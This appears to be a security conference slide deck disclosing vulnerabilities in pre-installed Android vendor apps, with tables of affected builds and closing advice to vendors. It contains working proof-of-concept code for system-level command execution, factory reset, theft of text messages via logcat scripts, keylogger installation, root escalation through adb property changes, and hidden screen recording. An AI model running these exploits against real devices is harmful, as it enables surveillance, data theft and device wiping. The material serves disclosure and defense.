<service android:exported="true" android:name=".MonitorUserSwitchedService"
android:process="com.asus.services"/>
</application>
19
Asus ZenFone V Live – Command Execution as system User
20. private void asus_zenfone_V_live_command_execution_as_system_user() {
Intent i = new Intent();
i.setClassName("com.asus.splendidcommandagent", "com.asus.splendidcommandagent.SplendidCommandAgentService");
SplendidServiceConnection servConn = new SplendidServiceConnection();
boolean ret = bindService(i, servConn, BIND_AUTO_CREATE);
Log.i(TAG, "initService() bound with " + ret);
}
class SplendidServiceConnection implements ServiceConnection {
public void onServiceConnected(ComponentName name, IBinder boundService) {
Log.i(TAG, "onserviceConnected");
Parcel send = Parcel.obtain();
Parcel reply = Parcel.obtain();
send.writeInterfaceToken("com.asus.splendidcommandagent.ISplendidCommandAgentService");
send.writeString("am broadcast -a android.intent.action.MASTER_CLEAR");
try {
boolean success = boundService.transact(1, send, reply, Binder.FLAG_ONEWAY);
Log.i(TAG, "binder transaction success=" + success);
} catch (RemoteException e) {
e.printStackTrace();
}
send.recycle();
reply.recycle();
}
public void onServiceDisconnected(ComponentName arg0) {
Log.i(TAG, "onServiceConnected");
}
}
20
Asus ZenFone V Live – Command Execution as system User
Source: https://www.verizonwireless.com/smartphones/asus-zenfone-v-live/
21. system User Capabilities on Android 7.1.1
• Video Record Screen of the user
• Take screenshots
• Factory reset the device
• Use logcat to obtain system-wide logs
• Set a custom keyboard with keylogging
functionality
• Change settings configurations
• Register an app as a notification listener
to get the user’s notifications
• Enable/disable apps
• Invert the screen colors
• Call (emergency) phone numbers
• Set a custom spell checker
• Change certain system properties
• Inject clicks, swipes, and text events in
the GUI (emulate the user)
• Launch any app component that does
not have android:enabled attribute
set to false
• Read/modify user’s text messages
• Read/modify user’s call log
• Read/modify user’s contacts
21
22. Sample of Asus Android Devices – Command
Execution as system User
Device Status Build Fingerprint
Asus ZenFone V Live (Verizon) Vulnerable asus/VZW_ASUS_A009/ASUS_A009:7.1.1/NMF26F/14.0610.1802.78-
20180313:user/release-keys
Asus ZenFone 3 Max Vulnerable asus/US_Phone/ASUS_X008_1:7.0/NRD90M/US_Phone-14.14.1711.92-
20171208:user/release-keys
Asus ZenFone 3 Ultra Vulnerable asus/JP_Phone/ASUS_A001:7.0/NRD90M/14.1010.1711.64-
20171228:user/release-keys
Asus ZenFone 4 Max Vulnerable asus/WW_Phone/ASUS_X00ID:7.1.1/NMF26F/14.2016.1803.232-
20180301:user/release-keys
Asus ZenFone 4 Max Pro Vulnerable asus/WW_Phone/ASUS_X00ID:7.1.1/NMF26F/14.2016.1803.232-
20180301:user/release-keys
Asus ZenFone 4 Selfie Vulnerable asus/WW_Phone/ASUS_X00LD_3:7.1.1/NMF26F/14.0400.1802.190-
20180202:user/release-keys
Asus ZenFone Live Vulnerable asus/WW_Phone/zb501kl:6.0.1/MMB29P/13.1407.1801.57-
20180307:user/release-keys
Asus ZenPad 10 Vulnerable asus/JP_P00C/P00C_2:7.0/NRD90M/JP_P00C-V5.3.20-
20171229:user/release-keys
Asus ZenPad 3 8.0 Vulnerable asus/WW_P008/P008_1:7.0/NRD90M/WW_P008-V5.7.3-
20180110:user/release-keys
Asus ZenPad S 8.0 Not Vulnerable asus/WW_P01M/P01M:6.0.1/MMB29P/WW_P01M-V5.6.0-
20170608:user/release-keys
22
23. Asus ZenFone 3 (ZE552KL) – Timeline for the
Command Execution as system User Vulnerability
23
Target Market Release Date Status Build Fingerprint
Japan 05/21/18 Vulnerable asus/JP_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1804.60-0:user/release-keys
Worldwide 05/16/18 Vulnerable asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1804.60-0:user/release-keys
Worldwide 05/03/18 Vulnerable asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1803.55-0:user/release-keys
Worldwide 04/19/18 Vulnerable asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1803.53-0:user/release-keys
Japan 04/19/18 Vulnerable asus/JP_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1803.52-0:user/release-keys
China 03/23/18 Not Vulnerable asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.201
0.1801.197-20180302:user/release-keys
Worldwide 03/14/18 Vulnerable asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1802.44-0:user/release-keys
Worldwide 02/12/18 Vulnerable asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1801.40-0:user/release-keys
China 02/12/18 Not Vulnerable asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.201
0.1801.196-20180108:user/release-keys
Worldwide 01/29/18 Vulnerable asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.0
26/15.0410.1801.40-0:user/release-keys
Japan 01/11/18 Vulnerable asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.
1712.85-20171228:user/release-keys
Worldwide 01/08/18 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.
1712.85-20171228:user/release-keys
Worldwide 12/22/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.
1711.83-20171220:user/release-keys
Worldwide 12/15/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.
1711.79-20171206:user/release-keys
Japan 11/22/17 Vulnerable asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.
1711.75-20171115:user/release-keys
Worldwide 11/21/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.
1711.75-20171115:user/release-keys
Target Market Release Date Status Build Fingerprint
Worldwide 10/13/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020
.1709.68-20171003:user/release-keys
China 09/06/17 Not Vulnerable asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
10.1706.184-20170817:user/release-keys
Japan 08/08/17 Vulnerable asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020
.1708.56-20170719:user/release-keys
Worldwide 08/03/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020
.1708.56-20170719:user/release-keys
China 07/24/17 Not Vulnerable asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
10.1706.181-20170710:user/release-keys
Worldwide 07/14/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020
.1706.53-20170628:user/release-keys
Italy 06/29/17 Vulnerable asus/TIM_Phone/ASUS_Z012D:7.0/NRD90M/14.202
0.1704.41-20170526:user/release-keys
Japan 05/17/17 Vulnerable asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020
.1703.33-20170424:user/release-keys
Worldwide 04/21/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020
.1703.28-20170410:user/release-keys
China 03/31/17 Not Vulnerable asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
10.1701.170-20170323:user/release-keys
Italy 03/28/17 Vulnerable asus/TIM_Phone/ASUS_Z012D:7.0/NRD90M/14.201
5.1701.13-20170310:user/release-keys
Worldwide 03/08/17 Vulnerable asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2015
.1701.8-20170222:user/release-keys
Japan 02/24/17 Not Vulnerable asus/JP_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
10.1612.161-20170205:user/release-keys
China 01/09/17 Not Vulnerable asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
.10.150-20161214:user/release-keys
Worldwide 12/28/2016 Not Vulnerable asus/WW_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
.10.152-20161222:user/release-keys
Worldwide 12/08/2016 Not vulnerable asus/WW_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20
.10.140-20161117:user/release-keys
24. @Override
public int onStartCommand(final Intent intent, int flags, int startId) {
new Thread() {
public void run() {
if (intent == null) {
stopSelf();
return;
}
String action = intent.getStringExtra("action");
if (action.isEmpty()) {
action = intent.getAction();
}
Log.i("DropboxChmodService", "action = [" + action + "]");
if (action.isEmpty()) {
stopSelf();
return;
}
try {
Process process = Runtime.getRuntime().exec(action);
Log.i("DropboxChmodService", "wait begin");
process.waitFor();
Log.i("DropboxChmodService", "wait end");
} catch (Exception e) {
e.printStackTrace();
}
}
}.start();
return super.onStartCommand(intent, flags, startId);
}
Oppo F5 (Non-US Carriers) – Command Execution as system User
com.dropboxchmod app exposes
this capability through an exported
service named DropboxChmodService
– Simple app containing only one class
with a single nested anonymous class
Recreated source code based on
the disassembled odex file
24
Intent i = new Intent();
i.setClassName("com.dropboxchmod",
"com.dropboxchmod.DropboxChmodService");
i.setAction("/system/bin/screenrecord --time-limit 60
/sdcard/notascreenrecording.mp4");
startService(i);
Source: https://www.flipkart.com/oppo-
f5-red-64-gb/p/itmezq6rgu7uhcf4
25. Approach 1: Transfer Command Output Using a Broadcast Receiver
1. Choose log tag (e.g., UQ2h9hVRhLfg) and register a broadcast receiver with it as an action string
2. Write lines of the script with selected log tag to the logcat log from the attacking app
Log.d("UQ2h9hVRhLfg", "#!/bin/sh");
Log.d("UQ2h9hVRhLfg", "content query --uri content://sms >
/data/data/com.dropboxchmod/msg.txt");
Log.d("UQ2h9hVRhLfg", "am broadcast -a UQ2h9hVRhLfg -p <attacking app’s package name>
--es data "$(cat /data/data/com.dropboxchmod/msg.txt)"");
3. Make the vulnerable app execute commands so it writes the lines to a shell script and executes it
logcat -v raw -b main -s UQ2h9hVRhLfg:* *:S -f /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh -d
chmod 770 /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
sh /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
25
26. Approach 2: Transfer Command Output Using a File in App’s Directory
1. Choose log tag with high entropy (e.g., UQ2h9hVRhLfg)
2. Make attacking app’s private directory world-executable and create a globally writable and
readable file (msg.txt)
3. Write lines of the script with selected log tag to the log from the attacking app
Log.d("UQ2h9hVRhLfg", "#!/bin/sh");
Log.d("UQ2h9hVRhLfg", "content query --uri content://sms >
/data/data/com.attacking.app/msg.txt");
4. Make the vulnerable app execute commands so it writes the lines to a shell script and executes it
logcat -v raw -b main -s UQ2h9hVRhLfg:* *:S -f
/data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh -d
chmod 770 /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
sh /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
26
27. Sample of Oppo Android Devices – Command
Execution as system User
Device Country Status Build Description
A77 China Vulnerable msm8953_64-user 7.1.1 NMF26F eng.root.20180609.153403 dev-keys
A59S China Vulnerable full_oppo6750_15131-user 5.1 LMY47I 1525865236 dev-keys
A57 Philippines Vulnerable msm8937_64-user 6.0.1 MMB29M eng.root.20180508.104025 release-keys
R11 China Vulnerable sdm660_64-user 7.1.1 NMF26X eng.root.20180426.130343 release-keys
F3 Plus Pakistan Vulnerable msm8952_64-user 6.0.1 MMB29M eng.root.20180413.004413 release-keys
A39 Australia Vulnerable full_oppo6750_16321-user 5.1 LMY47I 1520521221 release-keys
R9 China Vulnerable full_oppo6755_15111-user 5.1 LMY47I 1519426429 dev-keys
A77 Australia Vulnerable full_oppo6750_16391-user 6.0 MRA58K 1517824690 release-keys
F3 Vietnam Vulnerable full_oppo6750_16391-user 6.0 MRA58K 1517824690 release-keys
F3 Pakistan Vulnerable full_oppo6750_16391-user 6.0 MRA58K 1517824690 release-keys
R9 Australia Vulnerable full_oppo6755_15311-user 5.1 LMY47I 1516344361 release-keys
F5 Malaysia Vulnerable full_oppo6763_17031-user 7.1.1 N6F26Q 1516160348 release-keys
F1S Australia Vulnerable full_oppo6750_15331-user 5.1 LMY47I 1509712532 release-keys
A37 India Vulnerable msm8916_64-user 5.1.1 LMY47V eng.root.20171008.172519 release-keys
R7 Plus India Not Vulnerable msm8916_64-user 5.1.1 LMY47V eng.root.20160922.193102 dev-keys
Neo 5 Australia Not Vulnerable OPPO82_15066-user 4.4.2 KOT49H eng.root.1469846786 dev-key
R7S China Vulnerable msm8916_64-user 5.1.1 LMY47V eng.root.20160713.211744 dev-keys
R7 Plus China Not Vulnerable full_oppo6795_15019-user 5.0 LRX21M 1465722913 dev-keys
27
28. Setting Your App as the Default Keyboard for Some Keylogging
Have the attacking app implement an Input Method Editor (IME)
/system/bin/settings put secure enabled_input_methods <ones that were already
there>:com.my.app/.NotSomeKeyboardService
/system/bin/settings put secure default_input_method com.my.app/.NotSomeKeyboardService
Send key presses to the attacking app via a sending a broadcast intent to a dynamically-registered
broadcast receiver
Can also set your app as the default spell checker
– Does not get the same amount of data as the “custom” keyboard
/system/bin/settings put secure selected_spell_checker com.my.app/.NotSomeSpellingService
28
30. Exposed Screenshot Capability
Certain vendors have modified the Android OS (system_server) to
export the screenshot capability to any app on the device
– Alcatel A30, Asus Zenfone 3 Max, Leagoo P1, Nokia 6 TA-1025,
Asus ZenFone V Live & Sony Xperia L1
Malicious apps can open apps to obtain sensitive data and examine active
notifications
– Requires READ_EXTERNAL_STORAGE permission to access the
screenshot and EXPAND_STATUS_BAR to view current
notifications
Taking of a screenshot is not transparent to the user
– A screen animation is displayed and creates a notification
– Cannot be disabled, as the functionality lies within system_server
– Attacking app can cause a system crash to remove the notification
– Can bypass screen lock by using certain WindowManager.LayoutParams flags
30
31. Insecure Rich Communication Services (RCS) App
31
Source: https://www.t-mobile.com/devices/t-mobile-revvl-plus
Exported interfaces allow zero-permission app to send arbitrary text messages, read and
modify text messages, and obtain phone numbers of the user’s contacts
App has two different package names, where one is a
refactored version of the other
– com.rcs.gsma.na.sdk
– com.suntek.mway.rcs.app.service
Affects 3 T-Mobile devices: Coolpad Defiant,
T-Mobile Revvl Plus, and ZTE ZMAX Pro
App cannot be disabled
33. ZTE ZMAX Champ Vulnerabilities
Programmatic factory reset
– com.zte.zdm.sdm app writes --wipe_data to
/cache/recovery/command and boots into
recovery mode and wipes /data and /cache
Obtain logcat and modem logs
– Done in the same way described as previously for ZTE
“Brick” Device
– Device will boot into recovery mode, try to factory
reset, crash, and repeat and repeat some more
33
Source: https://www.zteusa.com/zmax-champ
35. Unlocked Alcatel A30 – Local root Privilege Escalation
Alcatel A30 was an Amazon Prime Exclusive device
– Had discounted price due to the inclusion of Amazon offers and ads
Certain read-only properties can be modified at runtime
allowing a socket that accepts and executes arbitrary
commands as the root user
– Can be performed via ADB or pre-installed platform apps that
execute as the system user
35
Source: https://www.amazon.com/gp/product/B01NC2RECJ
adb shell setprop ro.debuggable 1
adb shell setprop ro.secure 0
adb root
adb shell setenforce 0
adb shell
36. Unlocked Alcatel A30 – Socket that Executes Commands as root
Once the ro.debuggable property is set to 1,
then a world-writable socket named
factory_test gets created
– Receives and executes commands as root
The system user, including platform apps, can
change the ro.debuggable property so that
the factory_test socket gets created
36
MICKEY6US:/dev/socket # ls –al
total 0
drwxr-xr-x 7 root root 760 2017-05-10 17:58 .
drwxr-xr-x 15 root root 4220 2017-05-10 17:55 ..
srw-rw---- 1 system system 0 2017-05-10 17:58 adbd
srw-rw---- 1 root inet 0 1970-11-08 00:12 cnd
srw-rw---- 1 root mount 0 1970-11-08 00:12 cryptd
srw-rw---- 1 root inet 0 1970-11-08 00:12 dnsproxyd
srw-rw---- 1 root system 0 1970-11-08 00:12 dpmd
srw-rw---- 1 system inet 0 2017-05-10 17:55 dpmwrapper
srw-rw-rw- 1 root root 0 2017-05-10 17:58 factory_test
on property:ro.debuggable=1
start bt_wlan_daemon
service bt_wlan_daemon /system/bin/factory_test
user root
group root
oneshot
seclabel u:r:bt_wlan_daemon:s0
37. Takeaways - Towards More Secure Apps
Don’t export app components unnecessarily - enforce proper access control
Don’t assume apps without an accompanying Android Definition Interface
Language (AIDL) file cannot interact with a bound service…they can
Filter commands when allowing command execution as system user
Make it easier to report vulnerabilities by having a common email address such
as security@<vendor>.com
Thanks for attending and read our full report for more details! (email at
oem@kryptowire.com)
37
38. Leagoo P1 & Leagoo Z5C (Unlocked)
Leagoo P1 - Android 7.0
– Take a screenshot and write to SD card
– Programmatic factory reset
– Local root privilege escalation via ADB
Leagoo Z5C - Android 6.0
– Send arbitrary text messages
• Modified com.android.messaging app
– Read the most recent text message from each
conversation
• Modified com.android.messaging app
– Programmatic factory reset
• Modified com.android.settings app
38
adb shell setprop ro.debuggable 1
adb shell setprop ro.secure 0
adb root
adb shell setenforce 0
adb shell
Source: https://www.amazon.co.uk/LEAGOO-Z5C-Android-smartphone-1-3GHz/dp/B06X3QLCGY
39. Exposing Capability to Set System Properties
App named com.qualcomm.qti.modemtestmode allows any app to set
certain properties as the com.android.phone user
– Presumably a development/debugging app that should not be included in production builds
<service android:exported="true" android:name=".MbnTestService"
android:process="com.android.phone"/>
Bound service that takes key/value pair for system properties
– android.os.SystemProperties.set(String, String)
Setting properties is constrained by SELinux rules
– Works for persist.* properties which survive reboots
39
40. Vivo V7 (Non-US Carriers) Vulnerabilities
Dumps logcat, Bluetooth, and kernel logs to external storage
– Leaves a notification while logging, but logging app cannot be disabled
Set properties as the com.android.phone user
– Can enable screen touch coordinates to be written to the logcat log
Record the screen for 60 minutes to attacking app’s directory
– A notification and icon appears but can be removed quickly
– Can initiate screen-recording while screen is off to remove
any disturbance on the screen
40
Source: https://www.vivo.com/my/products/v7
41. Vivo V7 (Non-US Carriers) Vulnerabilities
41
The 60 minute interval is set by the com.vivo.smartshot app
– Screen recording is performed by the /system/bin/smartshot binary
Intent i = new Intent();
i.setAction("vivo.action.ACTION_START_RECORD_SERVICE");
i.setClassName("com.vivo.smartshot", "com.vivo.smartshot.ui.service.ScreenRecordService");
i.putExtra("vivo.flag.vedio_file_path", "/data/data/com.attacking.app/screen.mp4");
i.putExtra("show_top_stop_view", false);
startService(i);
try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}
i = new Intent();
i.setClassName("com.vivo.smartshot", "com.vivo.smartshot.ui.service.ScreenRecordService");
stopService(i);
try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}
i = new Intent("vivo.acton.ACTION_CHANGE_TOP_STOP_VIEW");
i.setClassName("com.vivo.smartshot", "com.vivo.smartshot.ui.service.ScreenRecordService");
i.putExtra("show_top_stop_view", false);
startService(i);
Starts recording
Removes notification
Ensures at least one app
component is running in
the app, so it is less likely
to get killed
Requires changing
permissions on the
directory and file
42. Orbic Wonder (Unlocked) Vulnerabilities
Exposes sensitive functionality to any app on the device
– Wipe all user data (factory reset)
– Continuously monitor the logcat log to obtain
• GPS coordinates
• Email addresses
• Unique device identifiers
• Body of incoming/outgoing text messages
• Phone numbers for incoming/outgoing calls
and text messages
Vulnerabilities can be used to bypass two-factor
authentication and obtain password resets texts
Source: https://www.bestbuy.com/site/orbic-wonder-4g-lte-
with-16gb-memory-cell-phone-unlocked-black/6070202.p
?skuId=6070202
42